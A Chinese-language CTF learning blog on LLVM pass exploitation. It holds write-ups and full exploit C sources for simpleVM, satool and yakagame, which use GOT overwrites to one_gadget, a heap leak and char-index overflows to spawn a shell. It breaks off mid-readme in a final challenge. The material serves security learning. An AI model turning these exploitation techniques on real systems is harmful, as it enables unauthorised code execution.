llvm pass pwn 入门学习
对于没有学习过C++的人来说很不友好,仿佛让我回到学习java的时候(java烂的一批),各种包,函数,实现类,什么迭代器,红黑树什么的,看来抽点时间学习一下c++是有必要的
环境
说实话这个环境搞了两天,老是报Error opening 'LLVMHello.so': LLVMHello.so: cannot open shared object file: No such file or directory这个错误解决方法就是加上绝对路径就行了或者在.bashrc或.zshrc中修改一下环境变量
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:.但是加上这个环境变量后就会出现一个问题:如果当前目录下有任何glibc的so文件就会直接加载它这就会导致出现Segmentation fault (core dumped)这个报错,基本上所有命令都不可以使用,这是一个非常坑的点,我差点以为我的ubuntu要挂了,不过不用担心我们可以将这个环境变量包装成一个命令,可以手动开启和关闭
alias llvm-ld="export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:."和alias llvm-rd="unset LD_LIBRARY_PATH"这样就可以放心使用了
一些命令
clang-8 -emit-llvm -S exp.c -o exp.ll 加载指定.so文件编译成中间文件.ll
./opt-8 -load ./VMPass.so -VMPass ./exp.ll 通过.ll文件进行攻击
set args -load VMPass.so -VMPass exp.ll 在调试时设置一些参数
llvm::Pass::preparePassManager 在开始调试时下的断点
如何搜索pass名称: alt+t 输入 namespace便可以找到
可以在
/usr/include/llvm-xx/llvm/IR/Instruction.def找到指令对应的编码数
2021红帽杯 simpleVM
程序分析
alt+t找到重写的runOnFunction函数是sub_6830`
这个一部分就是用来判断函数的名字是不是o0o0o0o0
进入sub_6AC0这一部分就是用来分析函数的基本块
进入sub_6B80 就是具体分析基本块的供能,并去实现它
这一部分有点长就不再具体分析,主要就是实现一个vm
主要就是llvm::CallBase这个抽象类,了解下面实现的方法就基本上就可以读懂这个程序的流程
Function *getCalledFunction() const: 这个方法用于获取被调用的函数指针。如果函数调用是一个直接调用(CallInst),并且被调用函数是已知的,那么该方法将返回被调用函数的指针;否则,返回nullptr。bool isIndirectCall() const: 这个方法用于检查函数调用是否是间接调用。如果函数调用是间接调用,那么它的目标函数是在运行时动态决定的,而不是在编译时确定的。Value *getCalledValue() const: 这个方法用于获取函数调用的被调用值。对于直接调用,该方法返回被调用的函数指针;对于间接调用,返回用于动态计算目标函数的值。unsigned getNumArgOperands() const: 这个方法用于获取函数调用指令的参数数量。Value *getArgOperand(unsigned i) const: 这个方法用于获取函数调用指令的第i个参数值。void setArgOperand(unsigned i, Value *val): 这个方法用于设置函数调用指令的第i个参数值为指定的val。OperandBundleUse getOperandBundle(StringRef Name) const: 这个方法用于获取函数调用指令中指定名称的操作数束。操作数束是用于传递额外信息的参数组合。void addOperandBundleUse(OperandBundleUse Bundle): 这个方法用于向函数调用指令添加一个操作数束。
漏洞就就是load和store可以通过这两个函数实现任意地址读写
漏洞攻击就是修改llvm::legacy::PassManager::~PassManager()的got表,我看好多人都是修改free函数的got表,但是不成功,就发现winmt师傅的方法可以打通,就是修改llvm::legacy::PassManager::~PassManager()的got表为onegadget
llvm::legacy::PassManager::~PassManager() 在 llvm::legacy::PassManager 对象的生命周期结束时被自动调用,用于执行清理和释放资源的操作。在对象的销毁过程中,会自动释放该 Pass 管理器对象所拥有的所有 Pass 对象,确保资源正确释放。
调试过程
add(1, 0x77E100);
效果:向寄存器1指定的地址中写入数据
load(1);
效果:将寄存器1中存放的地址的值放到寄存器2中
min(2, 0x9a6d0);
效果:就是将free函数的真实地址减了0x9a6d0(也就是free函数的偏移)
add(2, 0xe3afe);
效果:就是得到了onegadget的真实地址、
add(1, 0x870);
0x870是free的got表到2llvm::legacy::PassManager::~PassManager()@got.plt的距离
store(1);
效果将llvm::legacy::PassManager::~PassManager()@got.plt里面的值修改为onegadget
exp
// clang-8 -emit-llvm -S exp.c -o exp.ll
void add(int num, long long val);
void min(int num, long long val);
void load(int num);
void store(int num);
void o0o0o0o0()
{
add(1, 0x77E100); //got
load(1);
min(2, 0x9a6d0); // free forge
add(2, 0xe3afe); // onegadget
add(1, 0x870);
store(1);
}
//./opt-8 -load ./VMPass.so -VMPass ./exp.ll
CISCN-2021 satool
程序分析
还是首先找得到重写的runOnFunction由于是小端序,故函数名应是B4ckDo0r
主要有save,takeaway,stealkey,fakekey,run这几个函数,但只用到了save,stealkey,fakekey,run这几个函数
save
主要效果就是可以申请一个0x20的chunk,需要两个参数
stealkey
效果就是将申请的chunk中的值赋给key
fakekey
效果就是将fakekey的参数和chunk中前八个字节中存放的数进行相加并再次放到chunk
run
就是执行chunk中数据
攻击思路
既然有run这个漏洞,我就设法让chunk中出现onegadget
出现了堆,我们就看一下刚开始时bin中情况
我们可以发现当我们第二次申请chunk时就可以从ubuntu中申请,在联想stealkey和fakekey的功能,因此我们只要第二次使用save时第一个参数为空就行了,再利用stealkey将(main_area+96)放进key中在fakekey时,计算好偏移既可以将chunk放进一个onegadget
exp
void save(char *a, char *b);
void stealkey();
void fakekey(long long x);
void run();
void B4ckDo0r()
{
save("trunk", "trunk");
save("", "trunk");
stealkey();
fakekey(-0x1ecbf0+0xe3afe);
run();
}
强网杯-2022 yakagame
程序分析
本题重写的runOnFunction函数为sub_C880,PASS名称为ayaka。
分析可得这是一个元神玩家出的题,
fight函数
好像是一个攻击bss的一个过程,通过比较伤害和bss的血量的差来得到score,如果
score大于0x12345678
score的赋值语句是v53 = weaponlist[v54]; *score = v53 - boss;但是显然是不可能的因为weaponlist数组是char类型的
merge(无关紧要)
就是将某个武器的伤害加到另一个武器上
destroy(无关紧要)
将选择的武器伤害置零
upgrade(无关紧要)
将所有的武器伤害加上一个数值
4个对cmd的运算
可以对cmd进行加减异或运算,将原本的字符
0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68, 0x66转换为cat flag的asicc
else(非常重要)
由于之前没学习过c++ ,这里面使用了红黑树和迭代器混合进行一系列的操作,分析的时候基本不懂,调试老长时间才分析出大概流程(用词表达可能会很不恰当请见谅)
就是它会将不属于上面的所有函数和对应的参数用键值来一一对应,第一次进行配对时无法进入
if ( (std::operator==<char>(v22, v58) & 1) != 0 )中,只有第二次出现同一个函数名时才会进入,而且weaponlist[v33] = *(_BYTE *)(v24 + 0x20);中的v24时函数第一次出现时对应的参数,第二次出现的参数没有任何影响,这个赋值有一个漏洞就是v33是char类型,并且cmd和score就在weaponlist数组上面,也就是我们可以通过char类型整数溢出来修改score和cmd
exp
其实有两种,一种就是利用它给的四种运算得到cat flag,另一种就是直接修改cmd,让它指向sh
第一种:直接修改cmd
void fight(int weapon){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
trunk000(0);
trunk001(0);
trunk002(0);
trunk003(0);
trunk004(0);
trunk005(0);
trunk006(0);
trunk007(0);
trunk008(0);
trunk009(0);
trunk010(0);
trunk011(0);
trunk012(0);
trunk013(0);
trunk014(0);
trunk015(0);
trunk016(0);
trunk017(0);
trunk018(0);
trunk019(0);
trunk020(0);
trunk021(0);
trunk022(0);
trunk023(0);
trunk024(0);
trunk025(0);
trunk026(0);
trunk027(0);
trunk028(0);
trunk029(0);
trunk030(0);
trunk031(0);
trunk032(0);
trunk033(0);
trunk034(0);
trunk035(0);
trunk036(0);
trunk037(0);
trunk038(0);
trunk039(0);
trunk040(0);
trunk041(0);
trunk042(0);
trunk043(0);
trunk044(0);
trunk045(0);
trunk046(0);
trunk047(0);
trunk048(0);
trunk049(0);
trunk050(0);
trunk051(0);
trunk052(0);
trunk053(0);
trunk054(0);
trunk055(0);
trunk056(0);
trunk057(0);
trunk058(0);
trunk059(0);
trunk060(0);
trunk061(0);
trunk062(0);
trunk063(0);
trunk064(0);
trunk065(0);
trunk066(0);
trunk067(0);
trunk068(0);
trunk069(0);
trunk070(0);
trunk071(0);
trunk072(0);
trunk073(0);
trunk074(0);
trunk075(0);
trunk076(0);
trunk077(0);
trunk078(0);
trunk079(0);
trunk080(0);
trunk081(0);
trunk082(0);
trunk083(0);
trunk084(0);
trunk085(0);
trunk086(0);
trunk087(0);
trunk088(0);
trunk089(0);
trunk090(0);
trunk091(0);
trunk092(0);
trunk093(0);
trunk094(0);
trunk095(0);
trunk096(0);
trunk097(0);
trunk098(0);
trunk099(0);
trunk100(0);
trunk101(0);
trunk102(0);
trunk103(0);
trunk104(0);
trunk105(0);
trunk106(0);
trunk107(0);
trunk108(0);
trunk109(0);
trunk110(0);
trunk111(0);
trunk112(0);
trunk113(0);
trunk114(0);
trunk115(0);
trunk116(0);
trunk117(0);
trunk118(0);
trunk119(0);
trunk120(0);
trunk121(0);
trunk122(0);
trunk123(0);
trunk124(0);
trunk125(0);
trunk126(0);
trunk127(0);
trunk128(0);
trunk129(0);
trunk130(0);
trunk131(0);
trunk132(0);
trunk133(0);
trunk134(0);
trunk135(0);
trunk136(0);
trunk137(0);
trunk138(0);
trunk139(0);
trunk140(0);
trunk141(0);
trunk142(0);
trunk143(0);
trunk144(0);
trunk145(0);
trunk146(0);
trunk147(0);
trunk148(0);
trunk149(0);
trunk150(0);
trunk151(0);
trunk152(0);
trunk153(0);
trunk154(0);
trunk155(0);
trunk156(0);
trunk157(0);
trunk158(0);
trunk159(0);
trunk160(0);
trunk161(0);
trunk162(0);
trunk163(0);
trunk164(0);
trunk165(0);
trunk166(0);
trunk167(0);
trunk168(0);
trunk169(0);
trunk170(0);
trunk171(0);
trunk172(0);
trunk173(0);
trunk174(0);
trunk175(0);
trunk176(0);
trunk177(0);
trunk178(0);
trunk179(0);
trunk180(0);
trunk181(0);
trunk182(0);
trunk183(0);
trunk184(0);
trunk185(0);
trunk186(0);
trunk187(0);
trunk188(0);
trunk189(0);
trunk190(0);
trunk191(0);
trunk192(0);
trunk193(0);
trunk194(0);
trunk195(0);
trunk196(0);
trunk197(0);
trunk198(0);
trunk199(0);
trunk200(0);
trunk201(0);
trunk202(0);
trunk203(0);
trunk204(0);
trunk205(0);
trunk206(0);
trunk207(0);
trunk208(0);
trunk209(0);
trunk210(0);
trunk211(0);
trunk212(0);
trunk213(0);
trunk214(0);
trunk215(0);
trunk216(0);
trunk217(0);
trunk218(0);
trunk219(0);
trunk220(0);
trunk221(0);
trunk222(0);
trunk223(0);
trunk224(0);
trunk225(0);
trunk226(0);
trunk227(0);
trunk228(0);
trunk229(0);
trunk230(0);
trunk231(0);
//修改cmd 0x6EFDAD sh
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk236(0);
trunk237(0);
trunk238(0);
trunk239(0);
trunk240(0);
//修改score
trunk241(0);
trunk242(0x40);
trunk243(0);
trunk244(0);
trunk245(0);
trunk246(0);
trunk247(0);
trunk248(0);
trunk249(0);
trunk250(0);
trunk251(0);
trunk252(0);
trunk253(0);
trunk254(0);
trunk255(0);
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk241(0);
trunk242(0);
trunk243(0);
trunk244(0);
fight(0);
}
第二种
就是将
0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68,经过运算得到0x63 0x61 0x74 0x20 0x66 0x6C 0x61 0x67
菜鸡打算自己写一个脚本爆破一下,结果发现不行
我看C0Lin师傅使用下面方法得到的
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
guobapenhuo();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
void fight(int weapon){return;}
void wuxiangdeyidao(){return;}
void zhanjinniuza(){return;}
void guobapenhuo(){return;}
void tiandongwanxiang(){return;}
void upgrade(int val){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
trunk000(0);
trunk001(0);
trunk002(0);
trunk003(0);
trunk004(0);
trunk005(0);
trunk006(0);
trunk007(0);
trunk008(0);
trunk009(0);
trunk010(0);
trunk011(0);
trunk012(0);
trunk013(0);
trunk014(0);
trunk015(0);
trunk016(0);
trunk017(0);
trunk018(0);
trunk019(0);
trunk020(0);
trunk021(0);
trunk022(0);
trunk023(0);
trunk024(0);
trunk025(0);
trunk026(0);
trunk027(0);
trunk028(0);
trunk029(0);
trunk030(0);
trunk031(0);
trunk032(0);
trunk033(0);
trunk034(0);
trunk035(0);
trunk036(0);
trunk037(0);
trunk038(0);
trunk039(0);
trunk040(0);
trunk041(0);
trunk042(0);
trunk043(0);
trunk044(0);
trunk045(0);
trunk046(0);
trunk047(0);
trunk048(0);
trunk049(0);
trunk050(0);
trunk051(0);
trunk052(0);
trunk053(0);
trunk054(0);
trunk055(0);
trunk056(0);
trunk057(0);
trunk058(0);
trunk059(0);
trunk060(0);
trunk061(0);
trunk062(0);
trunk063(0);
trunk064(0);
trunk065(0);
trunk066(0);
trunk067(0);
trunk068(0);
trunk069(0);
trunk070(0);
trunk071(0);
trunk072(0);
trunk073(0);
trunk074(0);
trunk075(0);
trunk076(0);
trunk077(0);
trunk078(0);
trunk079(0);
trunk080(0);
trunk081(0);
trunk082(0);
trunk083(0);
trunk084(0);
trunk085(0);
trunk086(0);
trunk087(0);
trunk088(0);
trunk089(0);
trunk090(0);
trunk091(0);
trunk092(0);
trunk093(0);
trunk094(0);
trunk095(0);
trunk096(0);
trunk097(0);
trunk098(0);
trunk099(0);
trunk100(0);
trunk101(0);
trunk102(0);
trunk103(0);
trunk104(0);
trunk105(0);
trunk106(0);
trunk107(0);
trunk108(0);
trunk109(0);
trunk110(0);
trunk111(0);
trunk112(0);
trunk113(0);
trunk114(0);
trunk115(0);
trunk116(0);
trunk117(0);
trunk118(0);
trunk119(0);
trunk120(0);
trunk121(0);
trunk122(0);
trunk123(0);
trunk124(0);
trunk125(0);
trunk126(0);
trunk127(0);
trunk128(0);
trunk129(0);
trunk130(0);
trunk131(0);
trunk132(0);
trunk133(0);
trunk134(0);
trunk135(0);
trunk136(0);
trunk137(0);
trunk138(0);
trunk139(0);
trunk140(0);
trunk141(0);
trunk142(0);
trunk143(0);
trunk144(0);
trunk145(0);
trunk146(0);
trunk147(0);
trunk148(0);
trunk149(0);
trunk150(0);
trunk151(0);
trunk152(0);
trunk153(0);
trunk154(0);
trunk155(0);
trunk156(0);
trunk157(0);
trunk158(0);
trunk159(0);
trunk160(0);
trunk161(0);
trunk162(0);
trunk163(0);
trunk164(0);
trunk165(0);
trunk166(0);
trunk167(0);
trunk168(0);
trunk169(0);
trunk170(0);
trunk171(0);
trunk172(0);
trunk173(0);
trunk174(0);
trunk175(0);
trunk176(0);
trunk177(0);
trunk178(0);
trunk179(0);
trunk180(0);
trunk181(0);
trunk182(0);
trunk183(0);
trunk184(0);
trunk185(0);
trunk186(0);
trunk187(0);
trunk188(0);
trunk189(0);
trunk190(0);
trunk191(0);
trunk192(0);
trunk193(0);
trunk194(0);
trunk195(0);
trunk196(0);
trunk197(0);
trunk198(0);
trunk199(0);
trunk200(0);
trunk201(0);
trunk202(0);
trunk203(0);
trunk204(0);
trunk205(0);
trunk206(0);
trunk207(0);
trunk208(0);
trunk209(0);
trunk210(0);
trunk211(0);
trunk212(0);
trunk213(0);
trunk214(0);
trunk215(0);
trunk216(0);
trunk217(0);
trunk218(0);
trunk219(0);
trunk220(0);
trunk221(0);
trunk222(0);
trunk223(0);
trunk224(0);
trunk225(0);
trunk226(0);
trunk227(0);
trunk228(0);
trunk229(0);
trunk230(0);
trunk231(0);
//修改cmd 0x6EFDAD sh
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk236(0);
trunk237(0);
trunk238(0);
trunk239(0);
trunk240(0);
//修改score
trunk241(0);
trunk242(0x40);
trunk243(0);
trunk244(0);
trunk245(0);
trunk246(0);
trunk247(0);
trunk248(0);
trunk249(0);
trunk250(0);
trunk251(0);
trunk252(0);
trunk253(0);
trunk254(0);
trunk255(0);
trunk241(0);
trunk242(0);
trunk243(0);
trunk244(0);
upgrade(0xFF);
fight(0);
}
CISCN-2022 satool
这个确实很难,漏洞点不是很难理解,难的是shellcode怎么写入,目前只能跟着别人wp写一下脚本,就算自己知道思路也很难自己从头开始完成,就先记录一下思路和漏洞,
程序分析
主要是handle进行分析,看样子这个题的漏洞打法是shellcode
readme
## Introduction
A LLVM Pass that can optimize add/sub instructions.
## How to run
opt-12 -load ./mbaPass.so -mba {*.bc/*.ll} -S
## Example
### IR before optimization
```
define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
%2 = sub nsw i64 %0, 2
%3 = add nsw i64 %2, 68
%4 = add nsw i64 %0, 6
%5 = add nsw i64 %4, -204
%6 = add nsw i64 %5, %3
ret i64 %6
}
```
### IR after optimization
```
define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
